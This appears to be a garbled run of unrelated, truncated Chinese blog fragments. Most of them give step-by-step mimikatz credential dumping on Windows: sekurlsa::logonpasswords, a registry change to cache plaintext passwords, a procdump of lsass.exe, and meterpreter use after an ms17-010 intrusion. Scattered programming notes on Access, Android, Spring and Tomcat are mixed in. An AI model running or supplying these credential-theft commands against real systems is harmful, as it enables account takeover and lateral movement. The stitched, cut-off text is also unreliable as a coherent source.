一.windows2008以上不保存明文密码解决办法 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt 在默认情况下,当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,密码字段显示为null,此时可以通过以下方式开启,但需要用户重新登录后才能成功抓取. cmd:  reg add HKLM\SYSTEM\C

ACCESS数据的连接及语句执行操作,不难,久不用会生疏,每次都要找资料,干脆自己整理下,记录下来,需要的时候,直接查看,提高效率.也供初学者参考 1.连接字符串 public static string strConn = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" + Directory.GetCurrentDirectory() + "\\**.mdb;"; 2.数据语句执行(增删差改,用户名查重,根据用户

mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法. 国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便. 以管理员权限启动CMD执行下以命令即可: view source 1 powershell "

<!DOCTYPE html> <html> <head> </head> <body> <h1> 这是H1 </h1> <div id="div1"> </div> <script type="text/html" id="toolbar"> <input type="text" class=&quo

使用procdump64+mimikatz可实现从内存中获取明文密码 工具 链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38 首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样 1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp (注:必须使用管理员权限) ProcDump v8.0 - Wr

kali这方面不说了, meterpreter也略过, 做个关于mimikatz的笔记. mimikatz模块, 能获取对方机器的密码(包括哈希和明文). 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010 进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get system,但可能有些 权限管理严的 不一样) meterpreter > getuid Server userna

进去meterpreter后getuid一下 这获得系统管理员权限 开始 加载mimikatz模块 load mimikatz 加载成功. 第一种方法: 获取登录密码的hash值 msv 上面已经是得到hash值了. 下面算明文密码. 获取明文密码 kerberos look...拿到登录的明文密码了. 第二种方法: 使用另一种方式获取哈希值 mimikatz_command -f samdump::hashes 根据上面的方式获取明文密码 mimikatz_command -f sekurls

1.导出lsass.exe procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2.执行mimikatz mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit 效果: .#####. mimikatz (x64) built on Jun :: - lil! .## ^ ##. "A La Vie,

1 @echo off 2 >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" 3 if '%errorlevel%' NEQ '0' ( 4 goto UACPrompt 5 ) else ( goto gotAdmin ) 6 :UACPrompt 7 echo Set UAC = CreateObject^("Shell

Mimikatz 下载地址 https://github.com/gentilkiwi/mimikatz/releases 本地凭据破解 以管理员身份运行(拿到shell提权后) mimikatz#privilege::debug "测试是否OK,正确的返回应该是Privilege '20' OK" mimikatz#sekurlsa::logonpasswords "获取本机用户名.口令.SID.LM-HASH.NTLM-HASH" mimikatz#lsadum

使用mimikatz提取windows密码 以管理员运行后,可以随机打一些字符,进入如下界面 输入aaa::aaa,可展示所有模块: 可采用log命令,保存日志 获取hash与明文用户口令 privilege::debug sekurlsa::logonPasswords 从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和"纯文本"密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997

零.引言 之前写FTP工具库,用的是ftp4j,他使用其他非常简单方便,但是在细节上提供的可选项比较少(当然也可能是我了解不够深刻) 最新的项目重写了FTP工具类,选择了apache net中的ftp库,选择apache的原因有如下几个:1是我相信apche 2是它的注释完善(apache的代码注释值得每一位程序猿学习) 3是提供的可选配置(FTPConfig)有跟多选择(比如主动被动模式,断点续传等). 本人在使用ftp4j判定文件是否存在的时候,通过API(具体那个忘了)获取FTPFile对

工具 吾爱破解版本OD.IDA6.8 OD使用-动态分析 OD快捷方式 F2 下断点,也就是指定断点的地址F3加载一个可执行程序,进行调试分析F4程序执行到光标处 F5 缩小.还原当前窗口 F7 单步步入 F8 单步步过 F9 直接运行程序,遇到断点处,程序暂停 Ctrl+F2 重新运行程序到起始处,一般用于重新调试程序 Ctrl+F9 执行到函数返回处,用于跳出函数实现 Alt+F9 执行到用户代码处,用于快速跳出系统函数 Ctrl+G 输入十六进制地址,快速定位到该地址处 +/- 前一个后一

在控件ID正确的情况下,检查是否在实例化布局文件之后,获取LISTVIEW, 先inflate找layout下布局文件,并实例化后才能获得Listview的ID demo: public class FragmentPage extends Fragment { View view = null; @Override     @SuppressLint("HandlerLeak")     public View onCreateView(LayoutInflater inflater

1.获取到的值为空字符串 当url里有name属性,但是没有值的时候,后台用request.getParameter("name")获取到的是空字符串 2.获取到的值为null 当url里没有name属性时,request.getParameter("name")获取到的值是null

正常的图片缩放代码如: ByteArrayOutputStream baos = new ByteArrayOutputStream(); arg1.compress(Bitmap.CompressFormat.JPEG, 100, baos);//arg1为传进来的原始bitmap baos.toByteArray(); InputStream is = new ByteArrayInputStream(baos.toByteArray()); //进行缩放 BitmapFactory.Opt

法一: https://github.com/gentilkiwi/mimikatz/releases/tag/2.1.1-20170813 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 注:请以管理员权限!!! (什么?要管理员权限!有管理员权限了还要你干嘛....) 法二: meterreter下已集成了mimikata meterpreter > load mimikatz meterpreter > wd

第一种方式: xx.properties 属性名称错误,未与@Value("${xxx}") 进行对应 第二种方式: 该类未注入到spring bean容器中 @Component @Controller @Service # 上面未注入,使用 @Autowired 会报错 @Autowired   第三种方式: 采用 new 等方式获取该对象 @Component class TestValue{ @Value("${tag}") private String t

将懒加载关闭,@Lazy(false),默认为true import org.springframework.beans.BeansException; import org.springframework.context.ApplicationContext; import org.springframework.context.ApplicationContextAware; import org.springframework.context.annotation.Lazy; import

他妈的,参数有时可以获取,有时又不行,折腾了好久,把tomcat换成8.0的,之前用apache-tomcat-7.0.67

第一次使用ubuntu的时候 先使用这个命令 sudo passwd root 然后就可以改密码了